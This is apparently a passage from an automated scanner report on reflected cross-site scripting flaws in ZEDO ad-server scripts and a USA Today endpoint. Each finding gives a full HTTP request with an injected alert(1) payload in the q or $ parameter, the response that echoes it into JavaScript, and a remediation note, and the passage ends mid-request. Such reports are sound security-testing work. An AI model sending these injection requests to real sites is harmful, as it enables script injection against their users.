GET /bar/v16-406/d3/jsc/fm.js?c=2/1&a=0&f=&n=1099&r=13&d=9&q=&$=87099"%3balert(1)//5fff92f106d&s=1&l=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3b02/f/180/%252a/k%253B230856172%253B0-0%253B0%253B54838158%253B4307-300/250%253B38780865/38798622/1%253B%253B%257Eaopt%253D6/0/ff/1%253B%257Esscs%253D%253fhttp%3A//adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DBqcIQ3QnITYHLMdHzlAfkkdilD9mI4PMBAAAAEAEgjfDlBTgAWMG1jcYbYMmGhYmIpIQQsgERd3d3LmNzbW9uaXRvci5jb226AQozMDB4MjUwX2FzyAEJ2gEhaHR0cDovL3d3dy5jc21vbml0b3IuY29tL0J1c2luZXNz4AEEmAKIJ8ACAuACAOoCDjMwMHgyNTBBX01vbmV5-ALw0R6QA6QDmAPgA6gDAeAEAQ%2526num%253D0%2526sig%253DAGiWqtzUGb2mvqDPCSfB7Czyb06Trd9-Zg%2526client%253Dca-pub-6743622525202572%2526adurl%253Dhttp%253a%252f%252fwww.csmonitor.com/&z=0.16775888670235872 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFCap=1581B1219,212244|0,1,1; __qca=P0-591305981-1304358415303; PI=h749620Za805982Zc305002744%2C305002744Zs263Zt1122; FFAbh=847B162,20|313_1#365; ZFFAbh=845B826,20|1451_856#376Z1117_846#366Z798_845#365; FFgeo=2241452; FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1099:87099";alert(1)//5fff92f106d;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1099,2,9;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "ae1b52-8181-4a207a1458040"
Vary: Accept-Encoding
X-Varnish: 1332201874 1332193309
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=158
Expires: Mon, 09 May 2011 15:38:49 GMT
Date: Mon, 09 May 2011 15:36:11 GMT
Connection: close
Content-Length: 2013

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',87099";alert(1)//5fff92f106d';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,87099";alert(1)//5fff92f106d;z="+Math.random();}

if(zzuid=='unknown')zzuid='5ajh4goBADQAAFjiiCYAAABN~042311';

var zzhasAd=undefined;


                                                                                                       var zzStr
...[SNIP]...

2.63. http://d7.zedo.com/bar/v16-406/d3/jsc/fm.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-406/d3/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c084f'%3balert(1)//aea7f71949f was submitted in the q parameter. This input was echoed as c084f';alert(1)//aea7f71949f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-406/d3/jsc/fm.js?c=2/1&a=0&f=&n=1099&r=13&d=9&q=c084f'%3balert(1)//aea7f71949f&$=&s=1&l=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3b02/f/180/%252a/k%253B230856172%253B0-0%253B0%253B54838158%253B4307-300/250%253B38780865/38798622/1%253B%253B%257Eaopt%253D6/0/ff/1%253B%257Esscs%253D%253fhttp%3A//adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DBqcIQ3QnITYHLMdHzlAfkkdilD9mI4PMBAAAAEAEgjfDlBTgAWMG1jcYbYMmGhYmIpIQQsgERd3d3LmNzbW9uaXRvci5jb226AQozMDB4MjUwX2FzyAEJ2gEhaHR0cDovL3d3dy5jc21vbml0b3IuY29tL0J1c2luZXNz4AEEmAKIJ8ACAuACAOoCDjMwMHgyNTBBX01vbmV5-ALw0R6QA6QDmAPgA6gDAeAEAQ%2526num%253D0%2526sig%253DAGiWqtzUGb2mvqDPCSfB7Czyb06Trd9-Zg%2526client%253Dca-pub-6743622525202572%2526adurl%253Dhttp%253a%252f%252fwww.csmonitor.com/&z=0.16775888670235872 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFCap=1581B1219,212244|0,1,1; __qca=P0-591305981-1304358415303; PI=h749620Za805982Zc305002744%2C305002744Zs263Zt1122; FFAbh=847B162,20|313_1#365; ZFFAbh=845B826,20|1451_856#376Z1117_846#366Z798_845#365; FFgeo=2241452; FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1099,2,9;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "ae1b52-8181-4a207a1458040"
Vary: Accept-Encoding
X-Varnish: 1332201874 1332193309
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=158
Expires: Mon, 09 May 2011 15:38:49 GMT
Date: Mon, 09 May 2011 15:36:11 GMT
Connection: close
Content-Length: 2010

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='c084f';alert(1)//aea7f71949f';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=c084f';alert(1)//aea7f71949f;z="+Math.random();}

if(zzuid=='unknown')zzuid='5ajh4goBADQAAFjiiCYAAABN~042311';

var zzhasAd
...[SNIP]...

2.64. http://d7.zedo.com/bar/v16-406/d3/jsc/fm.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-406/d3/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4bc88"%3balert(1)//bd966777450 was submitted in the q parameter. This input was echoed as 4bc88";alert(1)//bd966777450 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-406/d3/jsc/fm.js?c=2/1&a=0&f=&n=1099&r=13&d=9&q=4bc88"%3balert(1)//bd966777450&$=&s=1&l=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3b02/f/180/%252a/k%253B230856172%253B0-0%253B0%253B54838158%253B4307-300/250%253B38780865/38798622/1%253B%253B%257Eaopt%253D6/0/ff/1%253B%257Esscs%253D%253fhttp%3A//adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DBqcIQ3QnITYHLMdHzlAfkkdilD9mI4PMBAAAAEAEgjfDlBTgAWMG1jcYbYMmGhYmIpIQQsgERd3d3LmNzbW9uaXRvci5jb226AQozMDB4MjUwX2FzyAEJ2gEhaHR0cDovL3d3dy5jc21vbml0b3IuY29tL0J1c2luZXNz4AEEmAKIJ8ACAuACAOoCDjMwMHgyNTBBX01vbmV5-ALw0R6QA6QDmAPgA6gDAeAEAQ%2526num%253D0%2526sig%253DAGiWqtzUGb2mvqDPCSfB7Czyb06Trd9-Zg%2526client%253Dca-pub-6743622525202572%2526adurl%253Dhttp%253a%252f%252fwww.csmonitor.com/&z=0.16775888670235872 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFCap=1581B1219,212244|0,1,1; __qca=P0-591305981-1304358415303; PI=h749620Za805982Zc305002744%2C305002744Zs263Zt1122; FFAbh=847B162,20|313_1#365; ZFFAbh=845B826,20|1451_856#376Z1117_846#366Z798_845#365; FFgeo=2241452; FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1099,2,9;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "ae1b52-8181-4a207a1458040"
Vary: Accept-Encoding
X-Varnish: 1332201874 1332193309
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=159
Expires: Mon, 09 May 2011 15:38:49 GMT
Date: Mon, 09 May 2011 15:36:10 GMT
Connection: close
Content-Length: 2010

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='4bc88";alert(1)//bd966777450';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=4bc88";alert(1)//bd966777450;z="+Math.random();}

if(zzuid=='unknown')zzuid='5ajh4goBADQAAFjiiCYAAABN~042311';

var zzhasAd=undefined;


                                                                                                       var zzStr
...[SNIP]...

2.65. http://d7.zedo.com/bar/v16-406/d3/jsc/fmr.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-406/d3/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c5170'%3balert(1)//90fb171ccd1 was submitted in the $ parameter. This input was echoed as c5170';alert(1)//90fb171ccd1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-406/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=9&q=&$=c5170'%3balert(1)//90fb171ccd1&s=1&l=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3b02/f/180/%252a/k%253B230856172%253B0-0%253B0%253B54838158%253B4307-300/250%253B38780865/38798622/1%253B%253B%257Eaopt%253D6/0/ff/1%253B%257Esscs%253D%253fhttp%3A//adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DBqcIQ3QnITYHLMdHzlAfkkdilD9mI4PMBAAAAEAEgjfDlBTgAWMG1jcYbYMmGhYmIpIQQsgERd3d3LmNzbW9uaXRvci5jb226AQozMDB4MjUwX2FzyAEJ2gEhaHR0cDovL3d3dy5jc21vbml0b3IuY29tL0J1c2luZXNz4AEEmAKIJ8ACAuACAOoCDjMwMHgyNTBBX01vbmV5-ALw0R6QA6QDmAPgA6gDAeAEAQ%2526num%253D0%2526sig%253DAGiWqtzUGb2mvqDPCSfB7Czyb06Trd9-Zg%2526client%253Dca-pub-6743622525202572%2526adurl%253Dhttp%253a%252f%252fwww.csmonitor.com/&z=0.16775888670235872 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFCap=1581B1219,212244|0,1,1; __qca=P0-591305981-1304358415303; PI=h749620Za805982Zc305002744%2C305002744Zs263Zt1122; FFAbh=847B162,20|313_1#365; ZFFAbh=845B826,20|1451_856#376Z1117_846#366Z798_845#365; FFgeo=2241452; FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1099:c5170';alert(1)//90fb171ccd1;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1099,2,9;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041:1099,2#702968|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1:0,17,1;expires=Wed, 08 Jun 2011 15:36:10 GMT;path=/;domain=.zedo.com;
ETag: "ae1b52-8181-4a207a1458040"
Vary: Accept-Encoding
X-Varnish: 1332201874 1332193309
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=159
Expires: Mon, 09 May 2011 15:38:49 GMT
Date: Mon, 09 May 2011 15:36:10 GMT
Connection: close
Content-Length: 2055

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',c5170';alert(1)//90fb171ccd1';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,c5170';alert(1)//90fb171ccd1;z="+Math.random();}

if(zzuid=='unknown')zzuid='5ajh4goBADQAAFjiiCYAAABN~042311';

var zzhasA
...[SNIP]...

2.66. http://d7.zedo.com/bar/v16-406/d3/jsc/fmr.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-406/d3/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 37620"%3balert(1)//694f98afb55 was submitted in the $ parameter. This input was echoed as 37620";alert(1)//694f98afb55 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-406/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=9&q=&$=37620"%3balert(1)//694f98afb55&s=1&l=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3b02/f/180/%252a/k%253B230856172%253B0-0%253B0%253B54838158%253B4307-300/250%253B38780865/38798622/1%253B%253B%257Eaopt%253D6/0/ff/1%253B%257Esscs%253D%253fhttp%3A//adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DBqcIQ3QnITYHLMdHzlAfkkdilD9mI4PMBAAAAEAEgjfDlBTgAWMG1jcYbYMmGhYmIpIQQsgERd3d3LmNzbW9uaXRvci5jb226AQozMDB4MjUwX2FzyAEJ2gEhaHR0cDovL3d3dy5jc21vbml0b3IuY29tL0J1c2luZXNz4AEEmAKIJ8ACAuACAOoCDjMwMHgyNTBBX01vbmV5-ALw0R6QA6QDmAPgA6gDAeAEAQ%2526num%253D0%2526sig%253DAGiWqtzUGb2mvqDPCSfB7Czyb06Trd9-Zg%2526client%253Dca-pub-6743622525202572%2526adurl%253Dhttp%253a%252f%252fwww.csmonitor.com/&z=0.16775888670235872 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFCap=1581B1219,212244|0,1,1; __qca=P0-591305981-1304358415303; PI=h749620Za805982Zc305002744%2C305002744Zs263Zt1122; FFAbh=847B162,20|313_1#365; ZFFAbh=845B826,20|1451_856#376Z1117_846#366Z798_845#365; FFgeo=2241452; FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1099:37620";alert(1)//694f98afb55;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1099,2,9;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041:1099,2#702968|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1:0,17,1;expires=Wed, 08 Jun 2011 15:36:10 GMT;path=/;domain=.zedo.com;
ETag: "ae1b52-8181-4a207a1458040"
Vary: Accept-Encoding
X-Varnish: 1332201874 1332193309
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=159
Expires: Mon, 09 May 2011 15:38:49 GMT
Date: Mon, 09 May 2011 15:36:10 GMT
Connection: close
Content-Length: 2055

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',37620";alert(1)//694f98afb55';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,37620";alert(1)//694f98afb55;z="+Math.random();}

if(zzuid=='unknown')zzuid='5ajh4goBADQAAFjiiCYAAABN~042311';

var zzhasAd=undefined;


                           var zzStr = "s=1;u=5ajh4goBADQAAFjiiCYAAABN~042311;z=
...[SNIP]...

2.67. http://d7.zedo.com/bar/v16-406/d3/jsc/fmr.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-406/d3/jsc/fmr.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9688d'%3balert(1)//fc22f686ec7 was submitted in the q parameter. This input was echoed as 9688d';alert(1)//fc22f686ec7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-406/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=9&q=9688d'%3balert(1)//fc22f686ec7&$=&s=1&l=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3b02/f/180/%252a/k%253B230856172%253B0-0%253B0%253B54838158%253B4307-300/250%253B38780865/38798622/1%253B%253B%257Eaopt%253D6/0/ff/1%253B%257Esscs%253D%253fhttp%3A//adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DBqcIQ3QnITYHLMdHzlAfkkdilD9mI4PMBAAAAEAEgjfDlBTgAWMG1jcYbYMmGhYmIpIQQsgERd3d3LmNzbW9uaXRvci5jb226AQozMDB4MjUwX2FzyAEJ2gEhaHR0cDovL3d3dy5jc21vbml0b3IuY29tL0J1c2luZXNz4AEEmAKIJ8ACAuACAOoCDjMwMHgyNTBBX01vbmV5-ALw0R6QA6QDmAPgA6gDAeAEAQ%2526num%253D0%2526sig%253DAGiWqtzUGb2mvqDPCSfB7Czyb06Trd9-Zg%2526client%253Dca-pub-6743622525202572%2526adurl%253Dhttp%253a%252f%252fwww.csmonitor.com/&z=0.16775888670235872 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFCap=1581B1219,212244|0,1,1; __qca=P0-591305981-1304358415303; PI=h749620Za805982Zc305002744%2C305002744Zs263Zt1122; FFAbh=847B162,20|313_1#365; ZFFAbh=845B826,20|1451_856#376Z1117_846#366Z798_845#365; FFgeo=2241452; FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041:1099,2#702968|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1:0,17,1;expires=Wed, 08 Jun 2011 15:36:10 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1099,2,9;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "ae1b52-8181-4a207a1458040"
Vary: Accept-Encoding
X-Varnish: 1332201874 1332193309
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=159
Expires: Mon, 09 May 2011 15:38:49 GMT
Date: Mon, 09 May 2011 15:36:10 GMT
Connection: close
Content-Length: 2052

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='9688d';alert(1)//fc22f686ec7';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=9688d';alert(1)//fc22f686ec7;z="+Math.random();}

if(zzuid=='unknown')zzuid='5ajh4goBADQAAFjiiCYAAABN~042311';

var zzhasAd
...[SNIP]...

2.68. http://d7.zedo.com/bar/v16-406/d3/jsc/fmr.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-406/d3/jsc/fmr.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c34aa"%3balert(1)//d137eb38567 was submitted in the q parameter. This input was echoed as c34aa";alert(1)//d137eb38567 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-406/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=9&q=c34aa"%3balert(1)//d137eb38567&$=&s=1&l=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3b02/f/180/%252a/k%253B230856172%253B0-0%253B0%253B54838158%253B4307-300/250%253B38780865/38798622/1%253B%253B%257Eaopt%253D6/0/ff/1%253B%257Esscs%253D%253fhttp%3A//adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DBqcIQ3QnITYHLMdHzlAfkkdilD9mI4PMBAAAAEAEgjfDlBTgAWMG1jcYbYMmGhYmIpIQQsgERd3d3LmNzbW9uaXRvci5jb226AQozMDB4MjUwX2FzyAEJ2gEhaHR0cDovL3d3dy5jc21vbml0b3IuY29tL0J1c2luZXNz4AEEmAKIJ8ACAuACAOoCDjMwMHgyNTBBX01vbmV5-ALw0R6QA6QDmAPgA6gDAeAEAQ%2526num%253D0%2526sig%253DAGiWqtzUGb2mvqDPCSfB7Czyb06Trd9-Zg%2526client%253Dca-pub-6743622525202572%2526adurl%253Dhttp%253a%252f%252fwww.csmonitor.com/&z=0.16775888670235872 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFCap=1581B1219,212244|0,1,1; __qca=P0-591305981-1304358415303; PI=h749620Za805982Zc305002744%2C305002744Zs263Zt1122; FFAbh=847B162,20|313_1#365; ZFFAbh=845B826,20|1451_856#376Z1117_846#366Z798_845#365; FFgeo=2241452; FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041:1099,2#702968|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1:0,17,1;expires=Wed, 08 Jun 2011 15:36:10 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1099,2,9;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "ae1b52-8181-4a207a1458040"
Vary: Accept-Encoding
X-Varnish: 1332201874 1332193309
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=159
Expires: Mon, 09 May 2011 15:38:49 GMT
Date: Mon, 09 May 2011 15:36:10 GMT
Connection: close
Content-Length: 2052

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='c34aa";alert(1)//d137eb38567';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=c34aa";alert(1)//d137eb38567;z="+Math.random();}

if(zzuid=='unknown')zzuid='5ajh4goBADQAAFjiiCYAAABN~042311';

var zzhasAd=undefined;


                           var zzStr = "s=1;u=5ajh4goBADQAAFjiiCYAAABN~042311;z=
...[SNIP]...

2.69. http://data.usatoday.net/apps/InsidePage [url parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://data.usatoday.net
Path:   /apps/InsidePage

Issue detail

The value of the url request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 5b62f(a)0ff55e3ea5c was submitted in the url parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /apps/InsidePage?var=blocks&url=5b62f(a)0ff55e3ea5c HTTP/1.1
Host: data.usatoday.net
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
